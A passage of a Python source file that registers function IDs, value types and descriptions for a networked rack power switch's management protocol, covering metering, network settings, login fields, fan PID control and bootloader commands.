# Rows are listed in the original registration order so dict insertion order
# in `functions` is unchanged; descriptions are reproduced byte-for-byte.
_CORE_FUNCTION_DEFS = (
    (1, "GeneralModuleStatus", "General status of a module",
     1, 0, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="", scale=0, min=0, max=65536)),
    (2, "SpecificModuleStatus", "",
     1, 0, dict(type="TYPE_UNSIGNED_NUMBER", size=1, unit="", scale=0, min=0, max=256)),
    (3, "CurrentTime", "Unix timestamp of the current time",
     1, 1, dict(type="TYPE_TIMESTAMP", size=4, unit="UNIX", scale=0, min=0, max=4294967296)),
    (4, "Voltage", "True RMS Voltage",
     1, 0, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="V", scale=2, min=0, max=65536)),
    (5, "Frequency", "Frequency",
     1, 0, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="Hz", scale=3, min=0, max=65536)),
    (6, "Current", "Current true RMS",
     1, 0, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="A", scale=3, min=0, max=65536)),
    (7, "Power", "Real Power",
     1, 0, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="W", scale=1, min=0, max=65536)),
    (8, "StatePortCur", "current port state", 1, 0, dict(type="TYPE_ENUM", size=1)),
    (9, "ActiveEnergy", "Active Energy",
     1, 0, dict(type="TYPE_UNSIGNED_NUMBER", size=4, unit="kWh", scale=3, min=0, max=4294967296)),
    (10, "ApparentEnergy", "Apparent Energy",
     1, 0, dict(type="TYPE_UNSIGNED_NUMBER", size=4, unit="kVAh", scale=3, min=0, max=4294967296)),
    (11, "Temperature", "Temperature",
     1, 0, dict(type="TYPE_SIGNED_NUMBER", size=2, unit="C", scale=1, min=-32768, max=32768)),
    (12, "Humidity", "Humidity",
     1, 0, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="%RH", scale=1, min=0, max=65536)),
    (13, "FanSpeed", "Fanspeed in Rounds per minute",
     1, 0, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="rpm", scale=0, min=0, max=65536)),
    (5000, "MaxCurrent", "Maximum port current occurred since last reset",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER_WITH_TS", size=6, unit="A", scale=3, min=0, max=65536)),
    (5001, "MaxPower", "Maximum port power occurred since last reset",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER_WITH_TS", size=6, unit="W", scale=1, min=0, max=65536)),
    (5002, "MaxTotalCurrent", "Maximum total current occurred since last reset",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER_WITH_TS", size=6, unit="A", scale=3, min=0, max=65536)),
    (5003, "MaxTotalPower", "Maximum total power occurred since last reset",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER_WITH_TS", size=8, unit="W", scale=1, min=0, max=4294967296)),
    (5004, "MaxVoltage", "Maximum voltage occurred since last reset",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER_WITH_TS", size=6, unit="V", scale=2, min=0, max=65536)),
    (5005, "MinVoltage", "Minimum voltage occurred since last reset",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER_WITH_TS", size=6, unit="V", scale=2, min=0, max=65536)),
    (5006, "MinTemperature", "Minimum temperature occurred since last reset",
     1, 1, dict(type="TYPE_SIGNED_NUMBER_WITH_TS", size=6, unit="C", scale=1, min=-32768, max=32768)),
    (5007, "MaxTemperature", "Maximum temperature occurred since last reset",
     1, 1, dict(type="TYPE_SIGNED_NUMBER_WITH_TS", size=6, unit="C", scale=1, min=-32768, max=32768)),
    (5008, "MinHumidity", "Minimum humidity occurred since last reset",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER_WITH_TS", size=6, unit="%RH", scale=1, min=0, max=65536)),
    (5009, "MaxHumidity", "Maximum humidity occurred since last reset",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER_WITH_TS", size=6, unit="%RH", scale=1, min=0, max=65536)),
    (10000, "Address", "Identification of the module",
     1, 0, dict(type="TYPE_UNSIGNED_NUMBER", size=4, unit="", scale=0, min=0, max=4294967296)),
    (10001, "ModuleName", "Module name", 1, 1, dict(type="TYPE_STRING", length=16)),
    (10002, "FirmwareVersion", "Firmware version", 1, 0, dict(type="TYPE_VERSION", size=4)),
    (10003, "HardwareVersion", "Hardware version", 1, 0, dict(type="TYPE_VERSION", size=4)),
    (10004, "FirmwareID", "Identification of the firmware", 1, 0, dict(type="TYPE_STRING", length=8)),
    (10005, "HardwareID", "Identification of the hardware", 1, 0, dict(type="TYPE_STRING", length=8)),
    (10006, "RackName", "Rack Name", 1, 1, dict(type="TYPE_STRING", length=16)),
    (10007, "RackPosition", "Position of the Energy Switch in the rack",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="", scale=0, min=0, max=65536)),
    (10008, "AdminLogin", "Admin Login", 1, 1, dict(type="TYPE_STRING", length=16)),
    (10009, "AdminPassword", "Admin Password", 0, 1, dict(type="TYPE_STRING", length=16)),
    (10010, "TemperatureUnitSelector", "", 1, 1, dict(type="TYPE_ENUM", size=1)),
    (10011, "IPAddress", "IP-address", 1, 1, dict(type="TYPE_IP", size=4)),
    (10012, "SubNetMask", "Subnetmask", 1, 1, dict(type="TYPE_SUBNETMASK", size=4)),
    (10013, "StdGateWay", "Standard gateway IP", 1, 1, dict(type="TYPE_IP", size=4)),
    (10014, "DnsServer", "Dns server IP", 1, 1, dict(type="TYPE_IP", size=4)),
    (10015, "MAC", "MAC address", 1, 0, dict(type="TYPE_MAC", size=6)),
    (10016, "DHCPEnable", "DHCP enable", 1, 1, dict(type="TYPE_ENUM", size=1)),
    (10017, "NTPServer", "NTP server IP", 1, 1, dict(type="TYPE_IP", size=4)),
    (10018, "UseDefaultNTPServer", "", 1, 1, dict(type="TYPE_ENUM", size=1)),
    (10019, "UseNTP", "", 1, 1, dict(type="TYPE_ENUM", size=1)),
    (10020, "SNMPTrapRecvIP", "SNMP trap server IP-address", 1, 1, dict(type="TYPE_IP", size=4)),
    (10021, "SNMPTrapRecvPort", "",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="", scale=0, min=0, max=65536)),
    (10022, "SNMPCommunityRead", "", 1, 1, dict(type="TYPE_STRING", length=16)),
    (10023, "SNMPCommunityWrite", "", 1, 1, dict(type="TYPE_STRING", length=16)),
    (10024, "SNMPControl", "", 1, 1, dict(type="TYPE_ENUM", size=1)),
    (10025, "TelnetCLIPort", "",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="", scale=0, min=0, max=65536)),
    (10026, "TelnetUARTMUXPort", "",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="", scale=0, min=0, max=65536)),
    (10027, "SelectUARTMUCChannel", "",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=1, unit="", scale=0, min=0, max=256)),
    (10028, "LDAPServer", "", 1, 1, dict(type="TYPE_IP", size=4)),
    (10029, "UseLDAPServer", "", 1, 1, dict(type="TYPE_ENUM", size=1)),
    (10030, "Beeper", "Beeper control enable beeper for n seconds",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=1, unit="s", scale=0, min=0, max=256)),
    (10031, "DisplayLock", "", 1, 1, dict(type="TYPE_ENUM", size=1)),
    (10032, "DisplayTimeOn", "",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=1, unit="min", scale=0, min=0, max=256)),
    (10033, "DisplayRotation", "", 1, 1, dict(type="TYPE_ENUM", size=1)),
    (10034, "PortName", "Name of the port", 1, 1, dict(type="TYPE_STRING", length=16)),
    (10035, "PortState",
     "The state of the port, only used to set the port state, see current port state to get the port state",
     1, 1, dict(type="TYPE_ENUM", size=1)),
    (10036, "CurrentPriorOff", "Priority level switch off when maximum total current exceeds threshold",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=1, unit="1H8L", scale=0, min=0, max=256)),
    (10037, "DelayOn", "Port activation delay after power recycle",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="s", scale=0, min=0, max=65536)),
    (10038, "MaxCurrentOff", "Maximum port current switch off level",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="A", scale=3, min=0, max=65536)),
    (10039, "MaxCurrentWarning", "Maximum port current warning level",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="A", scale=3, min=0, max=65536)),
    (10040, "MaxPowerOff", "Maximum port power switch off level",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="W", scale=1, min=0, max=65536)),
    (10041, "MaxPowerWarning", "Maximum port power warning level",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="W", scale=1, min=0, max=65536)),
    (10042, "MaxTotalCurrentOff", "Maximum total current switch off level",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="A", scale=3, min=0, max=65536)),
    (10043, "MaxTotalCurrentWarning", "Maximum total current warning level",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="A", scale=3, min=0, max=65536)),
    (10044, "MaxTotalPowerOff", "Maximum total power switch off level",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="W", scale=1, min=0, max=65536)),
    (10045, "MaxTotalPowerWarning", "Maximum total power warning level",
     1, 1, dict(type="TYPE_UNSIGNED_NUMBER", size=2, unit="W", scale=1, min=0, max=65536)),
)

for _guid, _name, _desc, _read, _write, _valdef in _CORE_FUNCTION_DEFS:
    func = Functions()
    functions[_guid] = func  # registered before attribute fill, as in the unrolled form
    func.guid = _guid
    func.name = _name
    func.description = _desc
    func.read = _read
    func.write = _write
    # Value(**kwargs) sets the given fields and leaves the rest None,
    # exactly like constructing Value() and assigning attributes one by one.
    func.valDef = Value(**_valdef)
func = Functions()
functions[10046] = func
func.guid = 10046
func.name = "MaxVoltageOff"
func.description = "Maximum voltage switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10047] = func
func.guid = 10047
func.name = "MaxVoltageWarning"
func.description = "Maximum voltage warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10048] = func
func.guid = 10048
func.name = "MinVoltageOff"
func.description = "Minimum voltage switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10049] = func
func.guid = 10049
func.name = "MinVoltageWarning"
func.description = "Minimum voltage warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10050] = func
func.guid = 10050
func.name = "ActiveEnergyReset"
func.description = "Active Energy"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10051] = func
func.guid = 10051
func.name = "ApparentEnergyReset"
func.description = "Apparent Energy"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10052] = func
func.guid = 10052
func.name = "MinTemperatureWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10053] = func
func.guid = 10053
func.name = "MaxTemperatureWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10054] = func
func.guid = 10054
func.name = "MinHumidityWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10055] = func
func.guid = 10055
func.name = "MaxHumidityWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10056] = func
func.guid = 10056
func.name = "LedStatus"
func.description = "To set Status of a led"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10057] = func
func.guid = 10057
func.name = "MatrixDisplayStatus"
func.description = "To set Status of a small matrix display"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10058] = func
func.guid = 10058
func.name = "Baudrate"
func.description = "To set baudrate for circular buffers"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10059] = func
func.guid = 10059
func.name = "P_PID"
func.description = "Proportional value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10060] = func
func.guid = 10060
func.name = "I_PID"
func.description = "Integral value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10061] = func
func.guid = 10061
func.name = "D_PID"
func.description = "Derivative value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10062] = func
func.guid = 10062
func.name = "WeightOfTempsensor"
func.description = "Gives the weight of a tempsensor to the input of a PID controller"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10063] = func
func.guid = 10063
func.name = "TargetTemp"
func.description = "Temperature to be set for PID controller"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10064] = func
func.guid = 10064
func.name = "MaximumPWM"
func.description = "Maximum value of pwm to control ventilators"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10065] = func
func.guid = 10065
func.name = "MinimumPWM"
func.description = "Minimum value of pwm to control ventilators"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10066] = func
func.guid = 10066
func.name = "Startuptime"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "s"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[40000] = func
func.guid = 40000
func.name = "JumpBoot"
func.description = "Enter bootloader mode. Normally this command is only sent to application program. When the bootloader is already running, this command will only reply a positive acknowledge."
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 0
func = Functions()
functions[40001] = func
func.guid = 40001
func.name = "GotoAddressmode"
func.description = "Addressing mode on/off"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40002] = func
func.guid = 40002
func.name = "GotoFactoryMode"
func.description = ""
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 16
func = Functions()
functions[40003] = func
func.guid = 40003
func.name = "DoSnapshot"
func.description = ""
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40004] = func
func.guid = 40004
func.name = "SampleChannelTime"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40005] = func
func.guid = 40005
func.name = "SampleChannelFFT"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40006] = func
func.guid = 40006
func.name = "FlushCallibData"
func.description = ""
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40007] = func
func.guid = 40007
func.name = "ModNum"
func.description = (
"To retrieve the number of modules connected to the device. The device itself is treated as module 0."
)
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[40008] = func
func.guid = 40008
func.name = "ModInfo"
func.description = "To retrieve module information"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 26
func = Functions()
functions[40009] = func
func.guid = 40009
func.name = "ApplyIPSettings"
func.description = ""
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[50000] = func
func.guid = 50000
func.name = "Monitor"
func.description = "Get the monitor values"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[50001] = func
func.guid = 50001
func.name = "Parameter"
func.description = "get all parameters"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[50002] = func
func.guid = 50002
func.name = "CircularReadBuffer"
func.description = "Read from slave(application connected to rs232) to master or from master to application"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_CIRCULAR_BUFFER"
func.valDef.size = 1
func = Functions()
functions[50003] = func
func.guid = 50003
func.name = "CircularWriteBuffer"
func.description = "Write of data from application to master or from master to slave(application connected to rs232)"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_CIRCULAR_BUFFER"
func.valDef.size = 1
func = Functions()
functions[50004] = func
func.guid = 50004
func.name = "VoltageTimeSamples"
func.description = "Get the voltage samples in oscilloscope view mode"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50005] = func
func.guid = 50005
func.name = "CurrentTimeSamples"
func.description = "Get the current samples in oscilloscope view mode"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50006] = func
func.guid = 50006
func.name = "VoltageFreqSamples"
func.description = "Get the frequency analyse of the voltage"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50007] = func
func.guid = 50007
func.name = "CurrentFreqSamples"
func.description = "Get the frequency analyse of the current"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50008] = func
func.guid = 50008
func.name = "Eeprom"
func.description = "read or write eeprom data"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50009] = func
func.guid = 50009
func.name = "CallibrationValues"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 2
func = Functions()
functions[60000] = func
func.guid = 60000
func.name = "BootReadID"
func.description = "Get the identification of the microcontroller. The response contains the values stored at memory address 0xFF0000 and 0xFF00002. (8 bytes in total)"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[60001] = func
func.guid = 60001
func.name = "BootJumpApp"
func.description = "Jump to the application, which starts at 0x4000. "
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 0
func = Functions()
functions[40013] = func
func.guid = 40013
func.name = "UDPUser"
func.description = "User mode for UDP commands"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[60002] = func
func.guid = 60002
func.name = "BootXTEA"
func.description = "Process a block of encrypted program memory data. The decrypted data will then be written into the program (flash) memory."
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[60004] = func
func.guid = 60004
func.name = "BootErase"
func.description = "Erase a page of program memory. The message takes one parameter, i.e. the page number. Valid page number for the dsPICFJ256 are from 16 to 170."
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[60005] = func
func.guid = 60005
func.name = "BootPageRange"
func.description = (
"To get the number of pages of the application firmware memory. Only pages within this range can be erased."
)
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[60010] = func
func.guid = 60010
func.name = "BootParameters"
func.description = "To set or retrieve the parameters of the device stored in flash during production (factory mode) such as: - Application firmware id (RTF-number) - Application firmware version - Hardware ID (RTH-number) - Hardware version - UID "
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[40010] = func
func.guid = 40010
func.name = "DHCPReset"
func.description = "Reset DHCP"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[14] = func
func.guid = 14
func.name = "CurrentIP"
func.description = "Gives the current IP. When DHCP is on, you can see here what ip is given by the DHCP server"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10067] = func
func.guid = 10067
func.name = "UserLogin"
func.description = "User Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10068] = func
func.guid = 10068
func.name = "UserPassword"
func.description = "User Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10069] = func
func.guid = 10069
func.name = "RestrictedUserLogin"
func.description = "Restricted User Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10070] = func
func.guid = 10070
func.name = "RestrictedUserPassword"
func.description = "Restricted User Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[60020] = func
func.guid = 60020
func.name = "BootAppFwID"
func.description = "Identification of the firmware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 8
func = Functions()
functions[60021] = func
func.guid = 60021
func.name = "BootAppFwVersion"
func.description = "Identification of the hardware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_VERSION"
func.valDef.size = 4
func = Functions()
functions[15] = func
func.guid = 15
func.name = "ApparentPower"
func.description = "Apparent power (this is the product of the current and the voltage)"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "VA"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[16] = func
func.guid = 16
func.name = "PowerFactor"
func.description = "Powerfactor "
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5010] = func
func.guid = 5010
func.name = "MinCurrent"
func.description = "Minimum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5011] = func
func.guid = 5011
func.name = "MinPower"
func.description = "Minimum port power occured since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5012] = func
func.guid = 5012
func.name = "MinPowerFactor"
func.description = "Minimum powerfactor occured per port since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5013] = func
func.guid = 5013
func.name = "MaxPowerFactor"
func.description = "Maximum powerfactor occured per port since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[17] = func
func.guid = 17
func.name = "TotalCurrent"
func.description = "Total current"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[18] = func
func.guid = 18
func.name = "TotalRealPower"
func.description = "Total real power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[19] = func
func.guid = 19
func.name = "TotalApparentPower"
func.description = "Total apparent power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "VA"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[20] = func
func.guid = 20
func.name = "TotalActiveEnergy"
func.description = "Total active energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[21] = func
func.guid = 21
func.name = "TotalApparentEnergy"
func.description = "Total apparent energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[22] = func
func.guid = 22
func.name = "TotalPowerFactor"
func.description = "Total power factor"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5014] = func
func.guid = 5014
func.name = "MinTotalCurrent"
func.description = "Minimum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
